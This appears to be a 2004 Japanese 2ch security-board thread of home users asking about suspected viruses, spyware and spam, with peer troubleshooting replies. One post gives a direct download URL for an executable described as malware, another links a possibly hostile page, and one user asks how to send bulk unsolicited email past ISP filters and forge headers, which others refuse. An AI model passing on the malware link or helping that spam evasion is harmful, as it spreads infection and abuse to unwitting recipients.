C:\〜\Temporary Internet Files\Content.IE5\FGQEOO6Y\stage[1].htm = ウイルス感染 : JS.Milala.a
eTrust:感染なし
【別のオンラインスキャンしたならその結果は】
トレンド:感染なし
シマンテック:感染なし
【症状を具体的に、分かる限りすべて書く】
異常見当たらず。
【何をしたらそんなことになったのか】
分からない。
【これまでにとった措置】
\Content.IE5 を探した。なかった。
「JS Milala」 をググッタ。良く分からなかった。JS.Amilala.aと言われてる人がいた。
>>7のA.2ので milala を探した。なかった。
【その他の質問】
これなんですか?
どうやって駆除するんですか?

89 :名無しさん@お腹いっぱい。:04/09/10 00:24
ANTIDOTEはすげえ誤検出多いから、ウイルスと判定してもウイルスじゃないことはよくある

90 :名無しさん@お腹いっぱい。:04/09/10 00:28
eTrustもアンチドートもよー知らんのだが、アンチウイルスソフト
二つ入れるって、アカンのとちゃうの。

91 :名無しさん@お腹いっぱい。:04/09/10 00:29
>>88
IEのキャッシュを削除してOKのはず。


92 :名無しさん@お腹いっぱい。:04/09/10 00:33
>>90
常駐するものを同時に使う事は出来ないが、
常駐するものと、しないものなら併用出来る。

93 :名無しさん@お腹いっぱい。:04/09/10 01:00
>>91
どうも。削除しました。

94 :名無しさん@お腹いっぱい。:04/09/10 10:56
>85,86
テンプレ乙

95 :名無しさん@お腹いっぱい。:04/09/10 13:23
thumbs.dbってトロイに関係あるファイルですか?プログラムファイルの中に見つけてしまった。いつのまに…

96 :名無しさん@お腹いっぱい。:04/09/10 13:31
>95
>86

97 :名無しさん@お腹いっぱい。:04/09/10 14:54:38
>>95
http://www.google.com/

98 :名無しさん@お腹いっぱい。:04/09/10 20:47:49
母のパソコンがあぼーんしそうなので助けてください。

【使用OS、WindowsUpdateの有無】していない。
【使用AntiVirus、Updateの有無】ウイルスバスター2004
【スキャンした結果(ウイルス名・発見場所)】スキャンしたが発見できず。
【症状】メールやグーグル検索で文字を入力すると、iiiiiiiiiiiiiiiと勝手に
 文字を打ってしまうらしいのです。ウイルスなのかも分からない。



99 :98 :04/09/10 20:49:04
すみません。慌てていたので忘れてしまいました。
OSはMeです。宜しくお願いします。

100 :名無しさん@お腹いっぱい。:04/09/10 20:58:19
>>98
ググる母親・・・
まずはキーボードのiのキーを外して、掃除することをお勧めする。

101 :名無しさん@お腹いっぱい。:04/09/10 21:21:39
質問です。
ぬるぽにかかったんですが、色々あってリカバリしまして、ぬるぽはなくなりました。
しかし、Dドライブのjpgだけが全て152MBになってて、
「プレビューを利用できません」ってなります。
ノートンでスキャンしても何も検出されませんでした。
どうか解決策を教えてください<(_ _)>


102 :名無しさん@お腹いっぱい。:04/09/10 21:36:25
>>101
マルチは氏ね

103 :名無しさん@お腹いっぱい。:04/09/10 21:58:17
>>101
セキュ板じゃnyの質問はご法度だし、ダウン板でもその質問じゃなー。
jpg上書きされたんで修復は不可能、以上。

あとはここ読め↓
【警報】Winnyを狙ったワーム・ウイルス情報
http://www.geocities.jp/kemkzuenc/Antinny.html

それから、今後ny系の質問はダウン板でするように。

104 :名無しさん@お腹いっぱい。:04/09/10 22:13:28
>>101

ガッ                          ガッ

105 :名無しさん@お腹いっぱい。:04/09/10 22:24:29
>104
律儀なやつだな

106 :名無しさん@お腹いっぱい。:04/09/11 03:15:44
>>105
ですね。あげ

107 :名無しさん@お腹いっぱい。:04/09/11 06:53:22
あるホームページの掲示板に頻繁に書き込みをしていました。
(やや辛口のコメントでそれなり反発を買っていたかも)
ここ最近 そのサイトを見ているときはなんでもないのですが
その後 パソコンの電源を入れた時、ブラウザ(IE)がハングアップ
しまいにはネットをつなぐことさえできなくなりました。
パソコンを空にして直すしかなくて(泣)繰り返した結果
どう考えてもそのサイトのアクセス後に不調をきたして
いるようにしか思えませんでした。
ネカフェや友達の家のPCからアクセスでは異常なしでした。
が、家にある2台のPCからの時は 異常が起こりました。
そこで質問です。
サイト管理者が 私のネット接続にのみアタックをかける
ような設定は可能でしょうか?




108 :名無しさん@お腹いっぱい。:04/09/11 07:01:38
107です。ごめんなさい。板間違いだったかも(;;)
初心者質問用スレに移します。
でも もしお答えいただけるなら この手のトラブルが
どういうプログラムなのか推察いただけると助かります。
(avast,Outpostセキュで入れています)お願いします。

109 :名無しさん@お腹いっぱい。:04/09/11 08:12:01
>>107
○痴
http://pc5.2ch.net/test/read.cgi/sec/1093131854/817

110 :名無しさん@お腹いっぱい。:04/09/11 11:00:30
ウイルスかどうか不明なのですが、会社で下記の症状が出ていたと
いうことなのですが、原因の心当たりがあれば、教えてくだされ

【使用OS】WinXP と Win2000
【WindowsUpdateしてるか】一部しているようだが最新にはしていな模様。
【AntiVirusは何を使っているか】Virus Scan
【ちゃんとUpdateしてるか】している。
【スキャンした結果(ウイルス名・発見場所)】
  VirusScanでは何も検出されず
  Norton AntiVirusのお試し版でやっても何も検出せず
【別のオンラインスキャンしたならその結果は】
感染拡大の可能性があるのでやってません
【症状を具体的に、分かる限りすべて書く】
  金曜の夕方から発生
lsass.exeの強制終了で再起動が繰り返されたとの証言(私は確認して
 いないが、複数の目撃証言あり)
  複数の部署のパソコンで同様の現象が報告(報告部署には直ぐにネット
 からの切り離しを依頼)
  一部のノートパソコンを収容して起動したところ、上記の症状が2〜
 3度確認されるが、その後、症状が消失し、何も異常なし
【何をしたらそんなことになったのか】
不明
  ある部署は、あるホームページを見に行った後から異常発生とのこと
【これまでにとった措置】
上記のアンチウイルスソフト以外に、SasserとKorgoの専用駆除ソフトを
 試すが、やはり検出されず
  新種のウイルスを疑い、シマンテック、トレンドマイクロ、Sophosの
 ホームぺージを現在までモニターするも、該当しそうなもの無し

これってなんなんでしょう


111 :名無しさん@お腹いっぱい。:04/09/11 11:26:16
オンラインスキャンしろよ

112 :名無しさん@お腹いっぱい。:04/09/11 12:31:48
>>110
とりあえずWindowsUpdateしてオンラインスキャン。それでウイルスいなきゃ多分平気。再起動したから必ずウイルスがいるわけではない。逆に再起動してなくても感染してることもある。

113 :名無しさん@お腹いっぱい。:04/09/11 12:34:44
>>110続き
心配だったら知識のある人にレジストリとスタートアップ見てもらったら?

114 :名無しさん@お腹いっぱい。:04/09/11 12:35:52
ウイルスが見つからないならlsass.exeのバグっぽいが。

115 :名無しさん@お腹いっぱい。:04/09/11 12:57:11
http://otoge3.web.infoseek.co.jp/cgi-bin/img-box/img20040830064114.html
これを間違えて踏んでしまって開いてる途中で強制終了したのですが
やばいですか?駆除の仕方とかわからないですが・・・

116 :名無しさん@お腹いっぱい。:04/09/11 13:04:48
リンクをはるなあほ
勇気のある人にまかせた↓

117 :名無しさん@お腹いっぱい。:04/09/11 13:40:18
>>115
OSのクリーンインストール

118 :名無しさん@お腹いっぱい。:04/09/11 13:49:50
>115
ラウンジの鑑定スレいってウイルスだといわれてから
>86のテンプレ読んで出直して来い

119 :名無しさん@お腹いっぱい。:04/09/11 14:40:48
PCよくわからなくて、WinXPなんですけど
この前から初期化されたりいきなり電源切れたり画面が固まったりエラーメッセージ表示されまくったりするんですけど
これってなんなのかわかる人いたら教えてくださいorz

120 :名無しさん@お腹いっぱい。:04/09/11 15:46:38
>PCよくわからなくて
貴様の言うことがわからんのだよ

>86のテンプレ読んで出直して来い

121 :名無しさん@お腹いっぱい。:04/09/11 16:23:52
>>115
誤って踏んでしまってPCがひどいことになりました
>>115さん、謝罪と賠償を
あと通報しときました

122 :名無しさん@お腹いっぱい。:04/09/11 16:51:10
トロイの木馬に感染しました。
OSはウインドウズ98です。
どうすれば良いですか?

123 :名無しさん@お腹いっぱい。:04/09/11 17:04:18
どいつもこいつも…
>85-86のテンプレ読んで出直して来い

124 :名無しさん@お腹いっぱい。:04/09/11 19:37:47
>>85-85のテンプレを読まないやつへのレステンプレ
OSのクリーンインストール


125 :名無しさん@お腹いっぱい。:04/09/11 20:17:38
>>124
それだとリカバリCDがどうこう言って来るオチ

126 :名無しさん@お腹いっぱい。:04/09/11 22:28:10
>>1すら読まない奴が>>85-86なんか読むはずが無い
無駄無駄
スルー推奨

127 :110:04/09/12 14:51:47
>112-114
どうもあんがと

その後、IEで特定サイトに行くとlsass.exeエラーで強制終了が
高確率で出ることがわかりました。あと、Virus Scanもからんでいる
可能性も
どうもウイルスではなさそうです

128 :名無しさん@お腹いっぱい。:04/09/12 14:56:49
【使用OS、WindowsUpdateの有無】
 WinXP。SP2はDLに失敗するのでまだいれてませんでした。
【使用AntiVirus、Updateの有無】
 フリーのAntiVir Guard。アップデートはおとといしました。
【スキャンした結果(ウイルス名・発見場所)】(オンラインスキャンしたならその結果も)
 上記ソフトでは何も出てきませんでした。
 タスクマネージャを見るとwinlogonという妙にCPUを使うプロセスがあり、
 終了させようとすると「重要なシステム プロセスです。〜」と出て終了できません。
【症状】
 起動中でない全てのファイルが削除されました。
 システムファイルが書き換えられているか(WinXPの?)CDを入れろという旨の警告も沢山出てきました。
 迂闊に電源落とすと起動できなくなりそうなので敢えて放置してますが、
 OSのインストールされていないドライブは98%空っぽになってます。
 フォルダはおそらく一切削除されていません。

 複数のことをしてたので原因は断定はできませんが、
 友人からもらったCD-Rの中身を見たりインストールしてる最中でした。
 インターネットには接続してました。
 メールは症状の出る30分ぐらい前に見てましたがBecky!2というシェアウェアを使用しています。
【これまでにとった措置】
 データ復元ソフトで復元を試みていますが、
 活動を行っている元凶がわからず上記の怪しいプロセスも終了できないため、
 復帰してもまた消されるんじゃないだろうか?という状態です。
 今はノートで接続して書き込んでいます

129 :名無しさん@お腹いっぱい。:04/09/12 15:00:41
間違いなくトロイにひっかかったっぽいんですが、
一部バックアップを取っていないファイルがあって、
最終的に一度まっさらにするにしてもそれを復元して救出したいので、
なんとか破壊活動をとめたいのですが、どうかご指南ください

130 :128:04/09/12 15:01:07
あ、すいません、128=129です。

131 :名無しさん@お腹いっぱい。:04/09/12 16:52:24
whiter系即時発動型みたいだな・・・
データ復元ソフトで復元できるもんなの?
教えてエロ意人!

132 :名無しさん@お腹いっぱい。:04/09/12 16:56:32
>>128
>タスクマネージャを見るとwinlogonという妙にCPUを使うプロセスがあり
winlogonは無害です

バックアップをとる前に「msconfig」を実行!
怪しげなサービスやスタートアップは削除もしくは停止!

バックアップ → クリンインスコを勧めます・・・・ってかノートン先生を勧めるが。。。

バックアップするときは「msconfig」で全てのサービスやスタートアップを無効にして
セーフモードでバックアップを勧めます!

133 :名無しさん@お腹いっぱい。:04/09/12 17:38:18
outlookで使っているホットメールのアカウントに、
普通の人からと思われるメールで、
「念のために返信しますが、どちらさまでしょうか?
知人のいたずらですか?」
という旨のメールが送られてきました。
実は似たようなメールが前にも来ました。

ノートン使ってて、アップデートしてから検索したけど、ウイルスは引っかからないし・・・
どうすればいいでしょう・・・。

134 :名無しさん@お腹いっぱい。:04/09/12 17:42:02
SPAMでつムシムシ

135 :名無しさん@お腹いっぱい。:04/09/12 17:51:11
質問です。
このところPCを立ち上げると、勝手にネットに接続してしまったり、
ネットを開くと見たこともないページが出てきたり、違うページに飛んでしまったり。
あと勝手に強制終了になったり・・。
なので店に行って状況を話したところウイルスではないと言われ、PESTPATROLを購入しました。
しかしいざCDを入れてダウンロードしようとすると、ダウンロード出来ませんとなってしまい
ずっと放置しています。
説明書に「Administrator権限のあるユーザーで行う必要がある」と書いてあったので、
セーフモードで立ち上げて、Administratorでログインして試みましたが結果は変わらず・・
どなたかPESTPATROLのインストールのやり方分かる方いらっしゃいませんか?
ちなみにWINDOWS XP HOME Editionです。

136 :名無しさん@お腹いっぱい。:04/09/12 17:52:53
ログインしようとすると即ログオフされてしまいます。
これって何かのウイルスに感染したんでしょうか?
また対策はどうすればいいんでしょう?

137 :マルチだけどまぁいいや:04/09/12 18:08:16
>>135
コントロールパネル→ユーザーアカウント→アカウントを変更する→自分のアカウントを選ぶ
アカウントの種類を変更する→「コンピュータの管理者」にチェック→再起動
で、できないかなぁ・・・。

138 :135:04/09/12 18:18:27
>>137
ありがとうございます。
早速やってみたんですが、既にコンピュータの管理者にチェックがついてました;


139 :135:04/09/12 18:22:03
ちなみにダウンロード用のCDを入れると、
16ビットWINDOWSサブシステム
システムファイルはアプリケーションを実行するのに適していません。
アプリケーションを終了するには閉じるを選んでください。
と出ます・・。

140 :名無しさん@お腹いっぱい。:04/09/12 18:31:23
>>139
先にスパイウェア駆除しないとインストールできないだろうよ

141 :名無しさん@お腹いっぱい。:04/09/12 18:41:41
>>139
サービスのWindows Installerは開始している?

142 :135:04/09/12 18:44:01
>>140
ペストパトロールをインストールすればスパイウェアとかハッカーツールも削除出来ると、
店の人が言ったので買ったんですが肝心のCDを入れてダウンロードしようとするとこんなんで…;

143 :135:04/09/12 18:45:48
>>141
それはどういったものですか??
多分してないです。


144 :名無しさん@お腹いっぱい。:04/09/12 18:55:48
インストール時のトラブル!

まず[ファイル名を指定して実行]−[msconfig]を実行
− [サービス]+[スタートアップ]のMS以外の物を無効化してOS再起動

「Admin権限でログイン」−[ファイル名を指定して実行]−[services.msc]を実行
[Windows Installer]を開始にする。

これで終わり、通常どぉりインストール・・・・・出来ると思う。。。

145 :135:04/09/12 19:15:06
>>144
今途中までやってみたんですが、
まずMS以外の物を無効にするというのは
どれを無効にすればいいんでしょうか。チェックを外せばいいんですよね??
あとInstallerを実行中にするにはシステム構成ユーティリティの中でどのような操作をすればよいのでしょうか?
何度もお手数をおかけしてすみません。

146 :名無しさん@お腹いっぱい。:04/09/12 19:19:28
>>145
セーフモードではネットに接続出来ないよな

147 :135:04/09/12 19:32:09
>>146
今セーフモードにはなってないです。

148 :144:04/09/12 20:08:31
> まず[ファイル名を指定して実行]−[msconfig]を実行
>− [サービス]+[スタートアップ]のMS以外の物を無効化してOS再起動

[サービス]+[スタートアップ]
・スタートアップは「全て無効ボタン」でOK
・サービスは「Microsoftのサービスを全て隠す」にチェックで出てきた
項目のチェックを外す

> 「Admin権限でログイン」−[ファイル名を指定して実行]−[services.msc]を実行
>[Windows Installer]を開始にする。

ここ重要!必ず「コンピュータの管理者」でログイン
そして、[ファイル名を指定して実行]−[services.msc]−Windows Installerを探す(必ずある!)
Windows Installerをダブルクリック「自動」+「開始」を実行

通常どぉりインストール!

149 :名無しさん@お腹いっぱい。:04/09/12 20:32:27
>>136
職場のパソコン?

150 :名無しさん@お腹いっぱい。:04/09/12 20:33:09
>>136
職場のパソコン?

151 :名無しさん@お腹いっぱい。:04/09/12 20:36:05
>>136
レジストリのユーザーハイブの破損です
セーフモードでAdministratorにログインして
新規にユーザーアカウントを作る
それすら不可能なら、修復インストールしかない

152 :135:04/09/12 21:16:41
>>148
丁寧な説明ありがとうございます^^
その通りに全部やっていざインストール用のCDを入れたらやはり下のような
メッセージが・・・。もう駄目なんですかね;
このペストパトロールのソフトを出しているネットジャパンという会社がサポート
をやっているんですが、月〜金の間だけでその間仕事をしている私は聞くに聞けないし;

[16ビットWINDOWSサブシステム
システムファイルはアプリケーションを実行するのに適していません。
アプリケーションを終了するには閉じるを選んでください。]

153 :名無しさん@お腹いっぱい。:04/09/12 21:23:36
>>152
小売店にインストールできない旨話して、返金してもらえんかね。

>>148さん乙でした。

154 :135:04/09/12 21:33:05
>>153
そうですね;
ビッ○カメラに聞いてみます;

本当にいろいろありがとうございましたm(_ _)m

155 :136:04/09/12 22:12:05
自宅のです。
今は携帯からカキコです。
よみにくてごめんなさい。


一応試してみます。

156 :名無しさん@お腹いっぱい。:04/09/13 12:46:09
ここは相当スキルのある人が多いようなので、板違い
かもしれませんが、どうかここで質問させてください。
メ−ル配信(合法の未承諾広告配信)について
詳しい方いましたら、教えていただきたいのですが、
どうしても販売したい商品があり、1ヶ月間だけ
メ−ル配信をしたいのですが、
ご存知の通りスパム規制などで、プロバイダーの
対応が厳しく、現在では合法の方法でさえ送信する手段が
全くありません。
調べるところがないほど調べましたが、
全くと言っていいほど手段が見つからずとても悩んでいます。
プロバイダーのSMTPサ−バ−を通さずにパソコンをサ−バ−にして
送信しても、苦情があれば即プロバイダーから警告がきて
アウトです。つまり現在のメ−ル配信は
よほどのスキルのある人でしか不可能なようです。
そこでお聞きしたいのですが、コンスタントに
メ−ル配信ができる方法があれば、どうか教えてください。
あつかましいお願いで申し訳ありませんが、
必死なのでどうかお願いいたします。
またメールのヘッダを変えて送信する方法なども
調べているのですが、かなり難しくて自分では分かりません。
分かる方いましたら、どうか教えてください。

※もしよければメ−ルにてご連絡いただけますと幸いです。

157 :名無しさん@お腹いっぱい。:04/09/13 12:51:43
>>156
ネタか? ただのアホか?
そんなもん送ってほしいやつはいねー。誰が教えてやるか!

158 :名無しさん@お腹いっぱい。:04/09/13 12:52:56
>>156
未承諾広告で客を捕まえようという発想を辞めればいいんじゃないかな

終 了

159 :157:04/09/13 12:54:10
>>156
「未承諾広告」なんてメールが来たって、誰も読みゃしねえ。
いい物を、本当に売りたいなら別の手を考えな。

160 :名無しさん@お腹いっぱい。:04/09/13 15:52:17
図々しいスパマ〜だな〜氏んでください

161 :名無しさん@お腹いっぱい。:04/09/13 15:53:24

【使用OS】 XP
【WindowsUpdateしてるか】 SP1は入れてません
【AntiVirusは何を使っているか】 ノートン2002(VAIO付属)→バスター2004体験版(古かったので昨日交換)
【ちゃんとUpdateしてるか】 OS入れなおしたので、SP1以降はまだ入れてません
【スキャンした結果(ウイルス名・発見場所)】 インターネット接続して1分後、HP閲覧しなくてもブロック
【別のオンラインスキャンしたならその結果は】 感染は見つかりません。
【症状を具体的に、分かる限りすべて書く】 HP閲覧中に「サーバーが見つかりません。」が多発します。
                           とにかくずっとバスターのブロックが出ます。
【何をしたらそんなことになったのか】 原因不明です。
【これまでにとった措置】 トレンドのHPから対処法探してMaicrosoftにアクセスしてみたんですけど、英語力無いので何したらいいのかわかりません。
                翻訳サイトで翻訳かけてもウィルスの影響かタイムアウトで翻訳できないため対処に困ってます。

162 :名無しさん@お腹いっぱい。:04/09/13 15:58:19
ネットワークウィルス名書くの忘れてました。
RPC_DCOM_BUFFER_OVERFLOWってやつです。
対処法よろしくお願いします。

163 :名無しさん@お腹いっぱい。:04/09/13 17:16:15
>>162
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=RPC%20DCOM%20BUFFER%20OVERFLOW


164 :名無しさん@お腹いっぱい。:04/09/13 17:33:53
IE、マイコンピュータ、OutlookExpress、JPEG以外のどんなファイル(アプリケーションやショートカット)を
実行しようとしてもメモ帳が開いてしまいます。これは何ですか?ウィルス以外だったらすみません

165 :名無しさん@お腹いっぱい。:04/09/13 17:46:43
>>163
ありがとう。。
今からインストールしてみます。

サーバーが見つかりません。が頻繁に出るのは、これが原因なんだろうか・・

166 :名無しさん@お腹いっぱい。:04/09/13 17:53:51
>>161
メイン画面→パーソナルファイアーウォール→ネットワークウイルス緊急対策設定
→ネットワークウイルスをブロックして、すべてのネットワーク接続を切断する
のチェックをオフにする。PFWは有効にしておくように。

>>164
拡張子の関連付けを変えられたんだろう。ウイルスの可能性高し。

167 :名無しさん@お腹いっぱい。:04/09/13 18:15:04
>>164に補足です。
どうやら、全ての拡張子(.exeも含む)がメモ帳に関連付けられてしまったようです。
ウィルススキャンしようにも、インストールしてあるNortonが実行できないのでスキャンできません。

168 :名無しさん@お腹いっぱい。:04/09/13 18:29:40
>>167
とりあえずノートンの関連付けだけ元に戻せばいいんでないか。

169 :名無しさん@お腹いっぱい。:04/09/13 18:45:36
>>167
nyですか?

170 :名無しさん@お腹いっぱい。:04/09/13 19:04:04
>>169
ギシギシアンアンだったけ?その後、聞かんななぁ・・・。

171 :名無しさん@お腹いっぱい。:04/09/13 19:10:17
>>169
nyではないです。あるexeファイルを実行したら今の状態になりました。
http://venus.aez.jp/uploda/dat/upload10202.exe ←コイツです。

たぶんこれが元凶だと思うので、間違っても実行しないでください。

172 :名無しさん@お腹いっぱい。:04/09/13 19:36:36
どんな言い訳しようとも、直リン貼った人にはレスしないことに決めました。

173 :名無しさん@お腹いっぱい。:04/09/13 20:04:30
>>172
それも次からテンプレに入れよう。

174 :名無しさん@お腹いっぱい。:04/09/13 20:36:38
>>171
誤って踏みました
重要なファイルが消えました
>>171さん、あなたに謝罪と賠償を
あと通報しておきました

175 :名無しさん@お腹いっぱい。:04/09/13 20:49:13
IEの等のツールバーにmakeme searchというツールバーが出てしまいました。
スパイウェア系の対策ソフトを使っても削除されません
どうやったら削除できるのでしょうか?


176 :メンドイから別スレに書いたのコピペ:04/09/13 21:00:41
>>175
エロサイト行ったろ?とか言わんから、とりあえずコッチのテンプレ嫁↓

エロサイト見たら・・・助けて下さい!Part40
http://pc6.2ch.net/test/read.cgi/pcqa/1094644028/l50

177 :名無しさん@お腹いっぱい。:04/09/13 21:29:05
avastとAVGどっち選ぶ?

って聞かれたから 「どっちも!」 って答えたら、「もういいよばか」って言われた

俺なんか変な事言った?(´・ω・`)

178 :名無しさん@お腹いっぱい。:04/09/13 21:30:14
うへぁ誤爆したスマソ

179 :名無しさん@お腹いっぱい。:04/09/13 21:34:08
>>177の誤爆元を探せ!!!!

180 :名無しさん@お腹いっぱい。:04/09/13 21:58:23
自己解決しました

181 :名無しさん@お腹いっぱい。:04/09/13 22:01:48
エロばっか

182 :名無しさん@お腹いっぱい。:04/09/13 22:15:33
スパイウェア駆除ソフト使ってたら、突然avastが反応して、Win32:Rameh [Trj]ってウィルスが検出されたんですけど、
詳細見ても英語で訳がわからず、Google検索しても英語サイトしか出てこなくて訳がわからず
結局感染したC:\WINDOWS\System32\atpartners.dllってファイル削除しちゃったんですけど
これで大丈夫なんでしょうか?

183 :名無しさん@お腹いっぱい。:04/09/13 22:19:33
>>182
検索の仕方が悪い。

184 :名無しさん@お腹いっぱい。:04/09/13 22:26:31
>>183
自己解決しました。
スパイウェアの一種だったみたいです

185 :名無しさん@お腹いっぱい。:04/09/13 22:29:22

    ∧_∧      諸君!
  ┌ ( `Д´ )   全面戦争と逝こうじゃないかね!!
  ├ (   ┏ ○┓_ _ _
  ├ つ┏┓三((〓((━(。゚。)三≡三=二===三
  └ ≡≡≡ノ  ̄  ̄  ̄  ̄
    (__(__)     ガがガがガガが
↓悪質サイトと戦闘中!救援求む!
http://news13.2ch.net/test/read.cgi/news/1094659162/

本日11時からです。
応援求む!


186 :名無しさん@お腹いっぱい。:04/09/13 22:36:50
>>185
まだやってたのか

187 :名無しさん@お腹いっぱい。:04/09/13 23:10:17
>>185
>>186

188 :156:04/09/13 23:27:34
ありがとうございます。
しかしどうしても1ヶ月間だけ試してみたいのです。
あつかましいお願いで申し訳ありませんが、
なんとかお願いできませんでしょうか?

189 :名無しさん@お腹いっぱい。:04/09/13 23:38:17
>>188
消えろ

190 :名無しさん@お腹いっぱい。:04/09/13 23:38:48
メモ帳開くやつなんとかなんない?
フォルダオプションで設定しなおしたら直った奴いたが、
やり方教えてー。

191 :名無しさん@お腹いっぱい。:04/09/13 23:42:51
>>188
あのー、セキュ板ってウイルス、スパイ・アドウェア、SPAMなど、自分が
要求してないものを勝手に送りつけられることから身(PC)を守ろうという
趣旨で成り立ってるし、当然そんなことする奴は大嫌いな人たちなんで、
これ以上ココで質問しても無駄だと思います。

>>190
状況がよくわからんのだが・・・。キンタマ?

192 :名無しさん@お腹いっぱい。:04/09/13 23:45:36
今日になって唐突にウィルスメールが大量に届くようになったんだが、
何かあったかな?
W32.Netsky.Q@mmってやつだけど。


193 :名無しさん@お腹いっぱい。:04/09/13 23:45:44
164と同じ症状です。ウイルススキャンでは異常なし。

194 :名無しさん@お腹いっぱい。:04/09/13 23:47:20
>>188
消えろ。屑。

195 :名無しさん@お腹いっぱい。:04/09/13 23:52:08
giga99992000@yahoo.co.jp

196 :名無しさん@お腹いっぱい。:04/09/13 23:52:50
>>188
てめーの垂れ流す糞に興味ねーんだよ死ね

197 :名無しさん@お腹いっぱい。:04/09/14 00:05:15
>>193
えーと>>190氏か?直リン貼った奴じゃないだろうな?w

フォルダオプション→ファイルの種類→変えたいのを選んで
下の「変更」で関連付け変えていく。

タスクマネージャーやレジストリも見といたほうがいいと思うけど・・・。

198 :名無しさん@お腹いっぱい。:04/09/14 00:10:28
>>192
あなたのメアドを登録している誰かが、感染・発症したと思われる。

199 :名無しさん@お腹いっぱい。:04/09/14 00:11:25
以下のような警告が頻繁に出るのですが、PCが感染しているのでしょうか?
スキャンしても発見できないので困っています。
なお、「W32.Netsky.P@mm!enc」はメールで5通/1日ほどの頻度でウイルスメールが来ているものです。

発生源: C:\DOCUME~1\jmari\LOCALS~1\Temp\CC2F.tmp
説明: ファイル C:\Documents and Settings\jmari\Local Settings\Temp
\CC2F.tmp は W32.Netsky.P@mm!enc ウイルスに感染しています。
クリックするとこの脅威についての詳しい情報を表示します :
W32.Netsky.P@mm!enc

私のPC情報は以下のとおりです。
MDIBrowser ver. 1.041-p2
[OS] Windows XP Service Pack 1
[IE] 6.0.2800
[Shell32.dll] 6.0.2800
[ComCtl32.dll] 6.0.2800

よろしくお願いいたします。

200 :199:04/09/14 00:13:05
書き忘れました。
ウイルスソフトは、ノートンアンチウイルスです。

201 :名無しさん@お腹いっぱい。:04/09/14 00:17:35
まりかわいいよまり

202 :名無しさん@お腹いっぱい。:04/09/14 00:18:23
>>199
コマンドプロンプトから消せば?

203 :199:04/09/14 00:41:13
>>202
>コマンドプロンプトから消せば?
これはどうやってやればいいのでしょうか?
PCが感染しているのではなくて、ウイルスソフトが反応してしまっているだけということですか?
たびたびすみません。


204 :名無しさん@お腹いっぱい。:04/09/14 00:48:02
>>203
AdministratorでTemporary Internet Filesを見ればあるんじゃね?

205 :名無しさん@お腹いっぱい。:04/09/14 01:02:32
>>203
そういう消し方もあるけど、マイコンピュータかエクスプローラーで
C:\Documents and Settings\jmari\Local Settings\Temp\CC2F.tmp
を見つけられないか?見つけられたらそれ削除
(フォルダオプションの表示で「すべてのファイルとフォルダを表示する」にチェック
「保護されたオペレーティングシステムファイルを表示しない(推奨)」のチェックを
外しとくこと)

206 :名無しさん@お腹いっぱい。:04/09/14 01:13:01
>>203
205でダメならこれ

1.スタートメニューからプログラム→アクセサリ→コマンドプロンプトを実行。
2.プロンプト(「>]マーク)の直後に「cd \」と入れて、リターンキーを押す。(これは呪文のようなものです。必須)。
3.次に同じく半角で「del」と入力し、そのあとに半角空白を入れる(重要)
4.そして、C:\>del "\Documents and Settings\jmari\Local Settings\Temp\CC2F.tmp"
           ↑        前後に引用符をつける(重要)             ↑

    として、リターンキーを押す。

ファイル消せたら、再度スキャンしてください。


207 :199:04/09/14 01:15:40
>>204 >>205、ありがとうございます。
205氏のやり方でやってみましたが、見つかりませんでした。
ノートンの履歴を見ると「検疫済」となっていたのでもう削除されているのかもしれません。
ただ特にネットサーフィンしているときでもなく、メールを受信しているのでもないときに、
警告が出るのはどういうわけなのでしょうか?
ウイルススキャンでは見つからないけれども、感染しているということなのでしょうか?



208 :199:04/09/14 01:16:40
>>206さん、ご丁寧にありがとうございます。
これからやってみます。

209 :190:04/09/14 01:22:04
>>197
拡張子とファイルの種類とやらが出てきたが、どれをどれに変更すればいいのやら…。

210 :197:04/09/14 01:48:10
>>209
いや、漏れもおまいのPCのアプリでどう関連付けしてるかまでわからんのよ。
XPの基本ソフトも多いし。
データファイルは退避させて、OS再インストール、アプリ再インストールの方が
早いかもわからん(ウイルス駆除になるかもしれないし)。

211 :名無しさん@お腹いっぱい。:04/09/14 01:50:08
差出人 : Technical Assistance <bpzpeizs-vqzwibxr@news.com>
送信日時 : 2004年9月13日 14:50:50
宛先 : "User" <vpqcdjvd_phhgamll@news.com>
件名 : current internet patch

Qd.exe (0.14 MB)←添付でついて来たけどこれ何?

こんなメールがマイクロソフト宛から来たんだけど
明らかにドメイン違ったんで怪しいと思い削除しますた。
(てかマイクロソフトを詠うかのような内容でした)

この手のメール若しくは送信先でご存知の方いたら
教えてー



212 :名無しさん@お腹いっぱい。:04/09/14 02:02:06
>>211
これっぽいな、完全ヒットじゃないけど・・・

サイバー犯罪に遭わないために・・・
第13回 偽装メール
ttp://www.pref.tottori.jp/police/seianbu/cyber/cyber_bouhan.oldd.htm

213 :名無しさん@お腹いっぱい。:04/09/14 02:10:56
>>212

でした

幸いウイルス検知はしなかったのでよかったものの
送信アドレスに対してサーバー側で受信できないよう
設定しときました
ちなみにWEBメールからの受信です(フリーMAIL)

214 :名無しさん@お腹いっぱい。:04/09/14 02:46:42
はああ…。
結局リカバリー…。

215 :名無しさん@お腹いっぱい。:04/09/14 03:10:51
ウィルスバスターのオンラインチェックで
C¥WINNT\downroadedPROGRAMFILES¥tl7000.DLLというファイルに
「TROJ_SOBIT.A」と言うトロイが感染していると出てきたんですが
検索をかけても該当のファイルが出てきません
再度ウィルスチェックをかけるとファイルはあることになっているのですが
どうしてでしょうか?わかる人いませんか(;´Д`)

216 :164:04/09/14 06:40:30
>>190
「コントロールパネル(クラシック表示)」→「フォルダオプション」→「ファイルの種類」
→「新規」で「ファイルの拡張子」に「exe」を入力、詳細設定をクリックして「関連付けられているファイルの種類」で
「アプリケーション」を選んで「OK」→同じ方法で拡張子「lnk」の関連付けを「ショートカット」にする

これで大体は動く。それ以外の拡張子の関連付けも手動で直せばOK。

217 :164:04/09/14 06:42:54
>>216
あ、ちなみに当方のマシンはxpなので、それ以外だったら知りません。

218 :名無しさん@お腹いっぱい。:04/09/14 08:29:44
XPです。
どこかのサイトの掲示板からウイルスをもらってしまいました・・・
ファイル名は確か、「clash me」だったと思います。
ノートン先生で「検疫しました」と出たのですが、これはウイルスがPC内から消えたと捉えてよろしいのでしょうか?

219 :218:04/09/14 08:31:50
すみません。ウイルス名は
Troja Ho・・・何とかでした。

220 :名無しさん@お腹いっぱい。:04/09/14 08:41:26
>>218-219
まずマニュアル読め。次にぐぐれ。それでも解らなければシマンテックに聞け。

お前の書いた内容は、以下と同じ。こんなんで誰が判るんだ?
「今日、田中って人が来たけど、犬が吠えたから追い返しました。
